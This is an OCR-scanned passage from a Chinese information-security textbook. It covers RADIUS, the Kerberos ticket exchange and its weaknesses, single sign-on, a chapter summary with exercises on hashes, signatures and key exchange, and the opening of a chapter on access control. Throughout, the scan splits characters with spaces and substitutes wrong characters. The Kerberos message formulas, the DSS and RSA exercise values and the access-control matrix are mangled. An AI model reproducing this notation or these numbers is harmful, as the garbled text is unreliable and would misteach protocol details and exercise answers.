RADIUS 的 特点 : 使 用 UDP 作为 传输 协议 ,两 个 UDP 端口 分 别 用 于 认证 (及 认证 后 
的 授权 ) 和 计 费 ,1812 号 是 认证 端口 ,1813 号 是 计 费 端口 ;支持 多 种 认证 方法 ,用 户 提交 用 户 
名 和 密码 时 ,RADIUS 服务 器 能 支持 PAP.CHAP、UNIX Login 和 其 他 认证 方法 。 


4.6.3 ”Kerberos 认证 系统 


Kerberos 源 于 希腊 神话 “三 个 头 的 狗 一 一 地 狱 之 门 守护 者 ”, 期 望 它 有 三 个 功能 : 身份 
认证 . 记 账 和 审核 。 系 统 按照 用 户 名 与 口令 对 用 户 进行 识别 ,Kerberos 认证 起 源 于 非法 收 
集 用 户口 令 的 恶意 攻击 。Kerberos 协议 是 Needham-Schroeder 协议 的 变型 ,目前 通用 版 本 
是 1994 年 公布 的 k5 。 

1. Kerberos 的 认证 原理 

Kerberos 针对 分 布 式 环境 ,采用 的 是 客户 端 /服务 器 (C/S) 模 型 。 客 户 端 在 工作 站 登录 
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时 需要 认证 ,必须 获得 由 认证 服务 器 发 行 的 许可 证 ,才能 使 用 目标 服务 器 上 的 服务 ,许可 证 
提供 用 户 访问 一 个 服务 时 所 需 的 授权 资格 。 所 有 客户 端 和 服务 器 间 的 会 话 都 是 暂时 的 。 

Kerberos 认证 的 核心 算法 为 密码 学 中 DES 的 CBC 模式 。Kerberos 不 依赖 用 户 的 终 
端 或 请 求 服务 的 安全 机 制 , 认 证 工作 由 认证 服务 器 完成 ,应 用 时 间 蕉 技术 防止 重 放 攻击 。 

Kerberos 拥有 保存 用 户 及 其 密 钥 的 数据 库 , 共 享 密 钥 只 被 用 户 和 Kerberos 知道 ,由 用 
户 在 登记 时 与 Kerberos 商定 。Kerberos 还 产生 一 个 会 话 密 钥 ,由 通信 双方 在 具体 的 通信 
中 使 用 。 

当 用 户 C 申请 得 到 某 服务 程序 S 的 服务 时 ,用 户 和 服务 程序 向 Kerberos 要 求 认 证 对 方 
的 身份 ,认证 建立 在 用 户 和 服务 程序 对 Kerberos 信任 的 基础 上 。 在 申请 认证 时 ,C 和 S 都 
是 Kerberos 认证 服务 的 用 户 。 当 用 户 登 录 到 工作 站 时 ,Kerberos 对 用 户 进行 初始 认证 ,此 
后 用 户 可 以 在 整个 登录 时 间 得 到 相应 的 服务 。 

Kerberos 提供 三 种 安全 等 级 : 初始 连接 认证 (只 在 网 络 开始 连接 时 进行 认证 ,后 来 的 通 
信 认 为 是 可 靠 的 ) .消息 传递 认证 (对 每 次 消息 的 传递 进行 认证 工作 ,但 可 能 有 被 泄露 的 消 
息 ) 和 私有 消息 认证 (对 每 条 消息 加 密 后 传递 并 认证 )。Kerberos 在 发 送 密码 时 就 采用 私有 
消息 模式 。 

2. Kerberos 认证 过 程 

用 户 C 请 求 服务 S 的 整个 认证 过 程 如 图 4. 51 所 示 , 其 中 C 是 客户 端 用 户 ,AS 是 认证 
服务 器 ,V 是 提供 服务 的 服务 器 ,DB 是 用 户 和 密 钥 


Kerberos 认 证 中 心 
数据 库 , TGS 是 票据 中 心 。AS、DB 和 TGS 构成 
Kerberos 认证 中 心 (KDC)。 AS TGS 
1) 认证 服务 交换 
GD C 请 求 票据 : C AS: ID. | ID | Ts 。 /pf 2> 
客户 C 将 用 户 标识 ID. 请求 的 票据 标识 IDe。 厂 客 F 户 C 下 一 天 一] 


和 请 求 时 惟 Ts 发 送 给 AS。 

(2) AS 许可 票据 : AS 一 C: Ex [Kws | ID 
| Ts | Lifetime2 | Tickets. ]。 

其 中 ,Ticketws = Exws [Kos | ID。 AD. | IDe。 | Ts || Lifetime2]。 

AS 认证 服务 器 将 C 和 TGS 间 的 会 话 密 钥 K.s,、TGS 的 标识 ID, ,发 送 时 蕉 Ts 、 有 
效 期 限 Lifetime2 和 票据 Ticketw: 用 C 和 AS 的 共享 密 钥 K。 加 密 打 包 传送 给 C。 

而 票据 Tickete. 用 TGS 和 AS 的 共享 密 钥 Ke 加 密 ,内 容 包括 C 与 TGS 的 共享 密 钥 
Kws 用户 标识 TID. ,用户 C 的 网 络 地 址 AD. .TGS 的 标识 ID。 ,应答 时 戳 Ts 和 有 效 期 限 
Lifetime2 。 

得 到 初始 化 令 牌 的 工作 在 用 户 登 录 时 进行 ,登录 时 用 户 被 要 求 输入 用 户 名 ,然后 向 AS 
发 送 一 条 包含 用 户 和 TGS 服务 两 者 名 字 的 请 求 , 以 及 时 戳 Ts (表示 是 新 请 求 ) 。 

AS 检查 用 户 有 效 , 则 随机 产生 用 户 和 TGS 通信 的 会 话 密 钥 Ke, 并 创建 令 牌 
Ticketw , 令 牌 包含 用 户 名 、 用 户 地 址 、TGS 服务 名 .当前 时 间 ( 时 戳 Ts ) 有 效 时 间 , 还 有 刚 
才 创建 的 会 话 密 钥 。 然 后 将 令 牌 用 Ke 加 密 。AS 向 C 发 送 加 密 过 的 令 牌 Ticketws 和 会 话 
密 钥 Kw ,发 送 的 消息 用 只 有 用 户 和 认证 服务 器 AS 知道 的 KK。 来 加 密 ,K。 是 基于 用 户 密 
码 的 导出 值 。 


图 4.51 Kerberos 结构 图 
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用 户 机 器 收 到 AS 回应 后 ,要 求 用 户 输入 密码 P., 将 密码 转化 为 DES 密 钥 K., 然 后 将 
AS 发 回 的 信息 解 开 ,保存 令 牌 Tickete 和 会 话 密 钥 Ke ,为 了 安全 ,用 户 密 码 P. 和 密 钥 
K。 则 被 丢弃 。 

当 用 户 的 登录 时 间 超 过 了 令 牌 的 有 效 时 间 时 ,用 户 的 请 求 就 会 失败 ,这 时 系统 会 要 求 用 
户 使 用 kinit 程序 重新 申请 令 牌 Tickete。。 用 户 运行 klist 命令 可 以 查看 自己 所 拥有 令 牌 的 
当前 状态 。 

2) C 从 TGS 得 到 所 请 求 服务 的 令 牌 Ticket、 

(1) C 请 求 服务 器 票据 : C 一 TGS: ID, | Ticketws | Authenticatore 。 

其 中 , Authenticator. 二 Excws [1D. | AD. | Ts ]。 

客户 C 将 服务 器 V 的 标识 ID, ,许可 票据 ( 令 牌 )Ticketw, 和 认证 符 Authenticatore 发 送 
给 票据 中 心 TGS; 而 认证 符 Authenticator。 由 用 户 标 识 ID.、 用 户 C 的 网 络 地 址 AD. 和 请 
求 时 蕉 Ts 组 成 ,用 C 和 TGS 间 的 会 话 密 钥 Ks 加 密 。 

(2) TGS 许可 服务 器 票据 : TGS -> C: Excws[K。, 上 ID, Ts | Ticket,]。 

其 中 ,Ticket, = 二 Ex,[K., | ID. || AD., | ID, Ts || Lifetime4] 。 

TGS 将 C 与 V 的 会 话 密 钥 KK。,、 用 户 标识 ID.、 用 户 C 的 网 络 地 址 AD.、 服 务 器 标识 
ID, ,请 求 时 惟 Ts 和 生成 的 服务 许可 票据 Ticket, 发 回 给 C; 服 务 许可 票据 Ticket, 由 会 话 
密 钥 KK。,、 用 户 标 识 ID.C 的 网 络 地 址 AD.、 服 务 器 标识 ID, .应 答 时 戳 Ts 和 有 效 期 限 
Lifetime4 组 成 ,用 V 和 TGS 的 共享 密 钥 人 加 密 。 

一 个 令 牌 只 能 申请 一 个 特定 的 服务 ,所 以 用 户 必须 为 每 一 个 服务 V 向 TGS 申请 新 的 
令 牌 Ticketv。 用 户 程序 首先 向 TGS 发 出 申请 令 牌 的 请 求 。 请 求 信息 中 包含 V 的 名 字 ,请 
求 TGS 服务 的 加 密令 牌 Ticketw, 、 加 密 过 的 认证 符 Authenticator。 认 证 符 含有 用 户 身份 、 
网 址 .时 戳 , 认 证 符 与 Ticket 不 同 , 只 用 一 次 且 有 效 期 短 。 

TGS 拥有 Ke ,解密 Ticketws 得 到 Kw ,再 解密 Authenticatore ,将 认证 符 中 的 数据 与 
票据 中 的 数据 比较 ,以 验证 票据 发 送 者 就 是 票据 持 有 者 。 如 果 有 效 ,TGS 生成 用 于 C 和 V 
之 间 通 信 的 会 话 密 钥 K。,, 并 生成 用 于 得 到 V 服务 的 令 牌 Ticket, ,其 中 包含 C 和 V 的 名 
字 、C 的 网 络 地 址 、 当 前 时 间 、 有 效 期 限 和 会 话 密 钥 KK.,。 令 牌 Ticket, 的 有 效 时 间 是 初始 令 
牌 Tickete. 剩 余 的 有 效 时 间 和 所 申请 的 服务 缺 省 有 效 时 间 中 最 短 的 时 间 。 

TGS 用 会 话 密 钥 Ke 加 密 Ticket, 和 会 话 密 钥 K。, ,然后 发 送 给 用 户 C。C 得 到 应 答 
后 ,用 Ke 解密 ,得 到 所 请 求 的 令 牌 Ticket, 和 会 话 密 钥 K。, 。 

3) 客户 端 与 服务 器 之 间 认 证 交换 

(1) C 请 求 服务 : C 一 V: Ticket, ‖ Authenticator。。 

其 中 ,Ticket, = Ex, LK., eID. | AD. || ID, || Ts || Lifetime4], Authenticator。 = 
Ee,sLID. | AD. | Ts]。 

C 向 V 发 送 服务 许可 票据 ( 令 牌 ) Ticket， 和 认证 符 Authenticator ,其 中 许可 票据 
Ticket, 不 变 , 而 认证 符 将 时 戳 更 新 为 Ts 并 采用 会 话 密 钥 KK.., 加 密 。V 收 到 后 用 K, 解密 
Ticket, ,然后 用 K., 解 密 认 证 符 。 比 较 得 到 的 用 户 名 、 网 络 地 址 和 时 间 等 信息 ,判断 C 的 身 
份 及 请 求 是 否 有 效 。 

用 户 和 服务 程序 之 间 的 时 钟 必须 同步 在 几 分 钟 的 时 间 段 内 , 当 请 求 的 时 间 与 系统 当前 
时 间 相 差 太 远 时 ,认为 请 求 是 无 效 的 ,用 来 防止 重 放 攻 击 。 为 防止 重 放 攻击 ,V 通常 保存 一 
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份 最 近 收 到 的 有 效 请 求 的 列表 , 当 收 到 一 份 请 求 与 已 经 收 到 的 某 份 请 求 的 令 牌 和 时 间 完 全 
相同 时 ,认为 此 请 求 无 效 。 

(2) V 许 可 服务 : V 一 C: Exc,[Ts 十 1]。 

当 C 也 想 验 证 V 的 身份 时 ,V 将 收 到 的 时 间 惟 加 1, 并 用 会 话 密 钥 K。, 加 密 后 发 送 给 用 
户 C, 用 户 收 到 回答 后 ,用 开 。., 解 密 后 对 增加 的 时 戳 进 行 验证 ,从 而 确定 V 的 身份 。 

此 后 ,客户 端 与 服务 器 之 间 通 过 共享 的 会 话 密 钥 秘密 通信 。 

3. Kerberos 的 技术 特点 

使 用 时 间 改 (Timestamp) ,减少 基本 认证 所 需要 发 送 消息 的 数目 ;使 用 票据 许可 
(Ticket-Granting ) 为 后 续 认 证 做 准备 ;使 用 交叉 认证 (不 同 服务 器 间 的 认证 ) ,定义 了 客户 端 
和 称 为 密 钥 分 配 中 心 (Key Distribution Center, KDC) 的 认证 服务 之 间 的 安全 交互 过 程 ,会 
话 建立 速度 要 比 NTLM 认证 (同时 要 与 域 控制 器 建立 连接 ) 快 得 多 。 

如 果 在 会 话 过 程 中 票据 超期 (票据 缓存 中 一 般 为 8 个 小 时 ) ,Kerberos 将 返回 一 个 响应 
的 错误 值 ,允许 客户 端 和 服务 器 刷新 票据 ,产生 一 个 新 的 会 话 密 钥 ,并 恢复 连接 。 会 话 票 据 
中 包含 有 一 个 唯一 的 .由 KDC 创建 的 ,用 于 客户 端 和 服务 器 之 间 传 输 数据 和 认证 信息 加 密 
的 会 话 密 钥 。 

KDC 是 作为 产生 会 话 密 钥 的 可 信 第 三 方 而 存在 的 ,更 适合 于 分 布 式 计算 环境 下 的 认证 
服务 。 允 许 代 表 合 法 者 的 进程 或 客户 在 不 通过 网 络 发 送 敏感 消息 的 情况 下 向 验证 者 (应 用 
服务 器 ) 证 实 自己 的 身份 ,保证 C/S 之 间 传 输 数据 的 完整 性 和 保密 性 。 

4. Kerberos 的 局 限 性 

(1) 时 间 同 步 问题 。 整 个 Kerberos 的 协议 都 严重 地 依赖 于 时 钟 ,而 分 布 式 系统 很 难 实 
现 良好 的 时 钟 同步 。 

(2) 口令 猜测 问题 。 口 令 没 有 进行 额外 的 特殊 处 理 。 

(3) 认证 域 之 间 的 信任 问题 。 认 证 域 之 间 的 多 级 跳跃 过 程 复杂 且 不 明确 ,相互 信任 和 
协调 不 方便 ,方便 的 域 间 服 务 将 付出 极 大 的 代价 。 应 建立 起 全 球 一 体 化 的 分 层 ( 树 状 ) 结 构 ， 
形成 良好 的 信任 链条 。 

(4) 重 放 攻 击 的 问题 。 长 期 票据 的 生存 期 较 长 ,容易 被 重 放 攻 击 ; 对 短期 票据 而 言 ,如 
果 攻 击 者 破坏 系统 的 时 钟 同步 ,也 有 机 会 重 放 攻 击 。 可 引入 序列 号 循环 机 制 , 即 让 传送 的 消 
息 带 上 一 定 的 序列 号 ,结合 系统 原 有 的 生存 期 控制 ,将 有 效 地 保证 一 定 的 时 间 段 里 只 能 存在 
唯一 的 合法 消息 ,从 而 消除 了 重 放 的 可 能 性 。 

(5) 密 钥 的 存储 问题 。 认 证 中 心 要 求 保 存 大 量 的 共享 私 钥 , 管 理 和 更 新 困难 。 

(6) 系统 程序 的 安全 性 、 完 整 性 问题 。 恶 意 算 改 登录 程序 是 有 效 的 攻击 方法 。 


4.6.4 单 点 登录 


随 着 用 户 登 录 系统 的 增多 ,出 错 的 可 能 性 就 会 增加 ,受到 非法 截获 和 破坏 的 可 能 性 也 增 
大 。 如 果 用 户 忘记 口令 ,就 需要 管理 员 帮 助 , 等 待 进入 系统 ,造成 管理 资源 开销 ,降低 效率 。 
如 果 用 户 简化 密码 或 使 用 相同 口令 会 危害 公司 安全 。 需 求 是 网 络 用 户 可 以 基于 最 初 访问 网 
络 时 的 一 次 身份 验证 ,对 所 有 被 授权 的 网 络 资源 进行 无 缝 的 访问 ,从 而 提高 用 户 工作 效率 ， 
降低 网 络 操作 费用 ,并 且 不 降低 网 络 的 安全 性 和 简便 性 。 
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单 点 登录 (Single Sign On,SSO) 是 目前 比较 流行 的 企业 业务 整合 的 解决 方案 之 一 。 
SSO 的 定义 是 在 多 个 应 用 系统 中 ,用 户 只 需要 登录 一 次 就 可 以 访问 所 有 相互 信任 的 应 用 
系统 。 

目的 是 简化 账号 登录 过 程 并 保护 账号 和 密码 安全 ,对 账号 进行 统一 管理 。 当 用 户 第 一 
次 访问 应 用 系统 1 的 时 候 , 因 为 还 没有 登录 ,会 被 引导 到 认证 系统 中 进行 登录 ;根据 用 户 提 
供 的 登录 信息 , 认证 系统 进行 身份 校 验 , 如 果 通 过 校 验 , 应 该 返回 给 用 户 一 个 认证 的 凭 
据 一 一 ticket; 用 户 再 访问 其 他 应 用 的 时 候 就 会 将 这 个 ticket 带 上 ,作为 自己 认证 的 凭据 ,应 
用 系统 接收 到 请 求 之 后 会 把 ticket 送 到 认证 系统 进行 校 验 ,检查 ticket 的 合法 性 。 如 果 通 
过 校 验 ,用 户 就 可 以 在 不 用 再 次 登录 的 情况 下 访问 应 用 系统 2 和 应 用 系统 3 了 。 

分 布 式 系统 由 独立 子 域 组 成 ,这 些 子 域 往往 由 不 同 应 用 程序 组 成 。 在 每 个 子 域 里 操作 
可 以 保证 安全 性 。 终 端 用 户 要 登录 一 个 子 域 ,必须 对 每 个 子 域 单独 出 示 能 证 明 自 己 身份 的 
证 书 (比如 先 登 录 主 域 , 再 登录 其 他 子 域 ) 。 

单 点 登录 的 特点 : 减少 用 户 在 不 同 子 域 中 登录 的 时 间 ;用户 不 必 记 住 一 大 堆 认证 信息 
减少 管理 员 增加 和 删除 用 户 账 号 的 时 间 以 及 降低 修改 用 户 权限 的 复杂 度 ;管理 员 容易 禁止 
或 删除 用 户 对 所 有 域 的 访问 权限 而 不 破坏 一 致 性 。 


本 章 小 结 


认证 往往 是 安全 访问 信息 系统 的 第 一 道 防线 ,是 防止 主动 攻击 的 重要 技术 。 它 以 密 
码 理论 为 基础 ,是 信息 安全 理论 的 重要 组 成 部 分 ,同时 也 是 访问 控制 和 审计 的 前 提 。 认 
证 (Authentication) 就 是 对 于 证 据 信 息 的 辨认 ,核实 、 鉴 别 , 以 建立 某 种 信任 关系 。 在 通信 
中 要 涉及 两 个 方面 : 一 方面 提供 证 据 或 标识 , 另 一 方面 对 这 些 证 据 或 标识 的 有 效 性 加 以 
辨认 核实、 鉴别 。 包括 对 信息 实体 的 完整 性 认证 和 操作 信息 实体 的 主体 对 象 的 身份 

杂凑 函数 ,也 称 为 Hash 函数 或 散 列 函数 ,是 将 任意 长 的 输入 消息 作为 输入 ,生成 一 个 
固定 长 的 输出 串 的 函数 。 其 构造 需要 利用 数学 难题 . 某 些 对 称 密码 体制 ,或 者 通过 直接 构造 
复杂 的 非 线性 关系 (如 MD4、MD5 和 SHA-1 等 )。 信 息 摘要 ,也 称 为 数字 指纹 或 认证 码 , 是 
利用 杂凑 函数 求 取 不 定 长 度 的 消息 获得 固定 长 度 的 数字 信息 。 

对 杂凑 函数 的 攻击 包括 预 映射 攻 击 .次 预 映 射 攻击 和 碰撞 攻击 (如 生日 攻击 ) 。 

数字 签名 是 以 密码 学 的 方法 对 数据 文件 产生 的 一 组 代表 签名 者 身份 和 数据 完整 性 的 数 
据 信 息 。 它 提供 了 一 种 鉴别 方法 ,以 解决 伪造 .抵赖 和 冒充 等 问题 ,是 实现 消息 认证 的 重要 
下 其。 

对 数字 签名 的 攻击 有 密 钥 攻击 .已 知 消息 攻击 和 选择 消息 攻击 。 攻 击 的 结果 有 完全 破 
译 、 一 致 伪造 .选择 性 伪造 和 存在 性 伪造 等 。 

可 以 利用 Hash 函数 和 加 密 算法 构造 数字 签名 ,典型 的 算法 有 RSA、ElGamal、.DSS 和 
椭圆 曲线 签名 等 ,还 有 讶 签名、 群 签名 \ 不 可 否认 签名 、 多 重 签名 和 代理 签名 等 。 

消息 认证 是 一 种 过 程 , 它 使 得 通信 的 接收 方 能 够 验证 所 收 到 的 报 文 (发 送 者 和 报 文 内 
容 .发送 时 间 , 序 列 等 ) 在 传输 的 过 程 中 没有 被 假冒 伪造 和 算 改 , 即 保证 信息 的 完整 性 和 真 
实 性 ,也 即 消息 有 效 性 。 包 括 消息 报 文 的 源 和 宿 认 证 .内容 认证 .时 间 和 序列 认证 等 。 
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身份 认证 又 称 作 识别 (Identification)、 实 体 认 证 (Entity Authentication) 和 身份 验证 
(Identity Verification) 等 ,是 系统 核实 (验证 ) 主 体 ( 用 户 ) 提 供 或 出 示 的 身份 标识 是 否 有 效 
的 过 程 , 决 定 主体 (用 户 ) 对 请 求 的 资源 的 存储 权 和 使 用 权 。 

身份 认证 通过 标识 身份 的 三 种 基本 要 素 或 其 组 合 来 完成 认证 : 

(1) 用 户 所 知道 的 某 个 秘密 信息 ,如 用 户口 令 、PIN 码 ,在 挑战 -响应 协议 中 已 被 证 实 的 
秘密 或 私 钥 。 

(2) 用 户 所 持 有 的 某 个 秘密 事物 (硬件 ) ,如 钥匙 、 磁 卡 .智能 卡 、 令 牌 或 用 户 所 申请 领取 
的 公 钥 证 书 。 

(3) 用 户 所 具有 的 某 些 生物 特征 或 属性 ,如 人 脸 .指纹 .声音 . 手 形 . 步 态 .DNA 图 案 和 
视网膜 扫描 等 。 

身份 认证 系统 架构 包含 三 项 主要 组 成 元 件 : 认证 服务 器 AS .认证 系统 客户 端 软件 和 认 
证 设备 。 身 份 识别 协议 包括 零 知 识 证 明和 分 割 选择 协议 。 认 证 使 用 口令 机 制 .主体 特征 机 
制 .数字 证 书 机 制 和 智能 卡 机 制 。RFID 是 当前 系统 标识 和 认证 主体 的 重要 技术 。 

实用 的 认证 方式 有 S/key、Kerberos 和 Radius。 单 点 登录 解决 企业 多 应 用 系统 统一 账 
号 问题 。 


习 题 4 


为 什么 需要 消息 认证 ? 

散 列 函 数 和 消息 认证 码 有 什么 区 别 ? 各 自 可 以 提供 什么 功能 ? 

杂凑 函数 可 能 受到 哪儿 种 攻击 ?你 认为 其 中 最 为 重要 的 是 哪 一 种 ? 

简 述 什么 是 数字 签名 ,什么 是 数字 信封 。 

数字 签名 和 散 列 函数 的 应 用 有 什么 不 同 ? 

数字 签名 需要 满足 哪些 条 件 ? 

利用 公 钥 密码 体制 进行 数字 签名 的 过 程 是 怎样 的 ? 

如 果 有 多 于 两 个 人 同时 对 数字 摘要 进行 签名 , 称 为 双 签 名 。 在 安全 电子 交易 协议 

(SET) 中 就 使 用 到 了 这 种 签名 。 双 签名 有 什么 意义 ?对 应 我 们 的 实际 生活 有 什么 

作用 ? 

4.9 在 DSS 数字 签名 标准 中 , 取 p=83=2X41 十 1,q=41,/=2,g=22 三 4 mod 83, 若 取 

Zz 二 57, 则 y 三 gx 三 457 二 77 mod 83。 在 对 消息 M 二 56 签名 时 (忽略 压缩 过 程 ) ,选择 

k= 二 23, 计 算 签名 并 进行 验证 。 

在 DSA 签名 算法 中 ,参数 k 泄露 会 产生 什么 后 果 ? 参数 重用 呢 ? 

设 通信 双方 使 用 RSA 加 密 体制 ,接收 方 的 公开 钥 是 (e,n) 二 (5,35), 消 息 为 28, 求 

签名 。 

4.12 利用 椭圆 曲线 签名 体制 , 设 椭圆 曲线 是 E11(1,6) ,生成 元 G=(2,7)。 接 收 方 A 的 秘 
密 钥 d=7,A 要 对 消息 e=h(m) 二 10 签名 ,选择 随机 数 上 = 二 3, 求 签名 。 

4.13 你 能 设计 一 种 结合 多 种 认证 方式 的 双 要 素 认 证 吗 ? 对 于 理论 环节 给 出 具体 算法 。 

实际 生活 中 有 哪些 身份 识别 技术 ? 网 站 设计 可 以 利用 本 章 学 过 的 哪些 安全 原理 ? 

基于 公 钥 密码 体制 分 配对 称 密 钥 时 ,假设 A 和 B 之 间 需 要 传输 数据 ,A 产生 一 个 会 
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话 钥 , 请 回答 下 列 问题 : 

(1) 在 事前 通信 时 ,发 送 方 A 应 该 得 到 什么 密 钥 ? 

(2) 会 话 钥 的 作用 是 什么 ? 

两 个 用 户 A 和 B 使 用 Diffie-Hellman 密 钥 交 换 方法 来 交换 密 钥 ,假设 公共 素数 p 为 
71, 本 原 根 a 为 7。A 和 了 分别 选择 秘密 数 为 5 和 12, 求 共有 密 钥 。 

结合 Kerberos 部 分 ,请 用 Linux 系统 实现 ,并 在 同学 间 展 开 讨 论 Windows、UNIX 和 
Linux 三 种 系统 间 实 现 认证 的 具体 区 别 。 


第 5 章 访问 控制 


5.1 访问 控制 概述 


访问 控制 是 国际 标准 化 组 织 (ISO) 在 网 络 安全 标准 ISO 7498-2 中 定义 的 5 种 层次 型 安 
全 服务 之 一 。 访 问 控制 的 最 终 目 的 是 通过 访问 控制 策略 显 式 地 准许 或 限制 主体 的 访问 能 力 
及 范围 ,从 而 有 效 地 限制 和 管理 合法 用 户 对 关键 资源 的 访问 ,防止 和 追踪 非法 用 户 的 侵入 以 
及 合法 用 户 的 不 慎 操 作 等 行为 对 权威 机 构造 成 的 破坏 。 

访问 控制 决定 用 户 能 做 什么 ,也 决定 代表 一 定 用 户 的 程序 能 做 什么 。 访 问 控制 决定 了 
谁 能 够 访问 系统 ,能 访问 系统 的 何 种 资源 以 及 如 何 使 用 这 些 资源 。 因 此 ,访问 控制 是 计算 机 
系统 安全 的 一 个 重要 组 成 部 分 。 

访问 控制 对 信息 的 机 密 性 完整 性 起 直接 的 作用 。 适 当 的 访问 控制 能 够 阻止 未 经 允许 
的 用 户 有 意 或 无 意 地 获取 数据 。 对 于 可 用 性 ,访问 控制 通过 有 效 控制 网 络 管理 指令 颁发 . 资 
源 滥用 和 拒绝 服务 攻击 等 来 实现 。 

1. 访问 控制 定义 

访问 控制 是 为 使 计算 机 系统 或 资源 在 合法 范围 内 使 用 ,依据 约定 的 规则 集合 对 经 过 身 
份 验证 的 主体 (用 户 或 用 户 代理 ) 访 问 客体 (需要 保护 的 资源 ) 的 权限 进行 限制 。 

用 一 个 三 元 组 来 表示 (S,0,4)。 其 中 ,$ 代表 主体 集合 ;O 代表 客体 集合 ,4 代表 访问 权 
限 集合 。 用 一 个 访问 控制 矩阵 表示 : 


Qo do ”don $0 
Qo QI ”an 51 

A=|. : ws ss [or or * 0o,] 
Um dm mn Sm 


对 于 任意 一 个 s; ES,0; EO 都 存在 相应 的 一 个 a; EA。ai 二 P(s;,0;), 其 中 了 是 访问 权 
限 的 函数 ,a; 代 表 s; 可 以 对 o 执行 什么 样 的 操作 。 

2. 访问 控制 的 三 个 要 素 

访问 控制 涉及 主体 .客体 和 控制 策略 三 个 要 素 ,三 者 之 间 关系 的 实现 构成 了 不 同 的 访问 
模型 ,访问 控制 模型 是 访问 控制 实现 的 基础 。 访 问 控制 模型 基本 组 成 如 图 5. 1 所 示 。 

(1) 主体 (Subject,S)。 是 指 访问 的 发 起 者 ,一 个 提出 访问 请 求 或 要 求 的 实体 。 有 时 也 
称 为 用 户 (User) 或 访问 者 (被 授权 使 用 计算 机 资源 的 用 户 代 理 ,如 进程 ,程序 等 )。 

根据 主体 权限 不 同 可 以 分 为 4 类 : 

@ 特殊 用 户 。 是 系统 管理 员 , 具 有 最 高 级 别 的 特权 ,可 以 访问 任何 资源 ,并 具有 任何 类 
型 的 访问 操作 能 力 。 

@ 一 般 用 户 。 是 最 大 的 一 类 用 户 , 其 访问 操作 受到 一 定 限制 ,由 系统 管理 员 分 配 。 

@ 审计 用 户 。 负 责 整 个 系统 范围 内 的 安全 控制 与 资源 使 用 情况 的 审计 。 

@ 废弃 用 户 。 是 被 系统 拒绝 的 用 户 。 


提出 访问 请 求 


提交 访问 请 求 
Submit Present 
i 究 币 | 字 - 能 示 
发 起 者 Access Request 访问 控制 实施 功能 Access Request 目标 
Initiator -+--，AEF -| | Target 
1 1 


请 求 决策 决策 


Decision Request Decision 


访问 控制 决策 功能 
ADF 


图 5.1 访问 控制 模型 基本 组 成 


一 个 主体 为 了 完成 任务 ,可 以 创建 另外 的 主体 ,这 些 子 主体 可 以 在 网 络 上 不 同 的 计算 机 
上 运行 ,并 由 父 主体 控制 它们 。 

(2) 客体 (Object,O)。 是 接受 其 他 实体 访问 的 被 动 实体 ,也 称 为 目标 。 一 般 指 可 供 访 
问 的 各 种 软 硬 件 资源 ,通常 包括 文件 ,数据 等 系统 需要 保护 的 资源 。 

主客 体 的 关系 是 相对 的 。 当 一 个 主体 受到 另外 一 个 客体 的 访问 时 ,这 个 主体 也 就 变 成 
了 客体 。 一 个 实体 可 以 在 某 一 时 刻 是 主体 ,而 在 另 一 时 刻 是 客体 ,这 取决 于 当前 实体 的 功能 
是 动作 的 执行 者 还 是 动作 的 被 执行 者 。 

(3) 控制 策略 (KS)。 是 主体 对 客体 的 操作 行为 集 和 约束 条 件 集 。 简 单 地 讲 ,控制 策略 
是 主体 对 客体 的 访问 规则 集 , 这 个 规则 集 直接 定义 了 主体 对 客体 可 以 操作 的 行为 和 客体 对 
主体 的 条 件 约束 。 控 制 策略 体现 为 一 种 授权 行为 ,任何 访问 控制 策略 最 终 可 被 模型 化 为 矩 
阵 形式 的 访问 规则 。 

访问 规则 是 规定 若干 条 件 下 对 客体 资源 的 访问 授权 。 规 则 使 用 户 与 资源 配对 ,指定 该 
用 户 可 在 该 资源 上 执行 哪些 操作 ,如 只 读 , 不 许 执行 或 不 许 访问 。 规 则 由 系统 管理 人 员 来 应 
用 ,由 硬件 或 软件 的 安全 内 核 部 分 负责 实施 。 在 用 户 身份 认证 和 授权 之 后 ,访问 控制 机 制 将 
根据 预先 设 定 的 对 用 户 访问 某 项 资源 进行 控制 ,只 有 规则 允许 时 才能 访问 ,违反 预定 的 安全 
规则 的 访问 行为 将 被 拒绝 。 

访问 授权 (Authorization) 是 规定 可 对 客体 资源 执行 的 访问 模式 或 权限 (例如 读 、 写 、 执 
行 或 拒绝 访问 )。 未 授权 的 访问 包括 未 经 授权 的 使 用 ,泄露 修改、 销毁 信息 ,非法 用 户 进入 
系统 以 及 合法 用 户 对 系统 资源 的 非法 使 用 等 。 

访问 模式 (访问 权限 ) 是 指 主体 对 客体 可 进行 的 特定 访问 操作 。 具 体操 作 如 读 (R)、 写 
(W) ,修改 (实际 上 可 读 可 写 ) 、 添 加 (a) ,删除 (d) ,运行 (e) 等 。O(Owner) 是 一 种 特殊 的 访问 
权 , 即 控制 权 、 拥 有 权 , 指 某 个 主体 具有 改变 其 他 主体 对 某 客 体 的 访问 权限 的 能 力 ,C(Creat) 
也 是 一 种 特殊 的 访问 权 , 即 创建 权 , 可 以 创建 系统 的 某 个 主体 或 客体 。 

3. 访问 控制 的 内 容 

访问 控制 包括 三 方面 的 内 容 : 认证 ,控制 策 略 实现 、 审 计 。 访 问 控制 与 身份 认证 ,授权 、 
审计 等 其 他 安全 机 制 的 关系 如 图 5. 2 所 示 。 

认证 包括 用 户 身份 认证 \ 主 体 对 客体 的 识别 和 客体 对 主体 检验 认证 两 方面 。 

控制 策略 的 具体 内 容 包 括 规则 集 设 定 方法 、 允 许 授权 用 户 和 限制 非法 用 户 保护 敏感 信 
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图 5.2 访问 控制 与 其 他 安全 机 制 的 关系 


息 、 禁 止 越权 访问 等 。 确 保 正常 用 户 对 信息 资源 的 合法 使 用 , 既 要 防止 非法 用 户 ,也 要 考虑 
敏感 资源 的 泄露 ,更 不 能 越权 行使 控制 策略 所 赋予 其 权利 以 外 的 功能 。 

审计 包括 开启 日 志 记录 用 户 对 系统 的 关键 操作 威慑。 审计 的 重要 意义 在 于 威慑 ,比如 
客体 的 管理 者 即 管理 员 有 操作 赋予 权 , 但 无 法 在 策略 中 约束 其 滥用 这 一 权利 ,必须 对 这 些 行 
为 进行 记录 ,从 而 达到 威慑 和 保证 访问 控制 正常 实现 的 目的 。 

4. 访问 控制 的 实现 框架 

访问 控制 是 主体 对 客体 提出 访问 的 请 求 后 ,对 这 一 申请 进行 批准 ,允许 、 撤 销 的 全 过 程 
进行 有 效 控制 ,从 而 确保 只 有 符合 控制 策略 的 主体 才能 合法 访问 。 

访问 控制 由 两 个 重要 过 程 组 成 : 通过 认证 来 检验 主体 的 合法 身份 ;通过 授权 
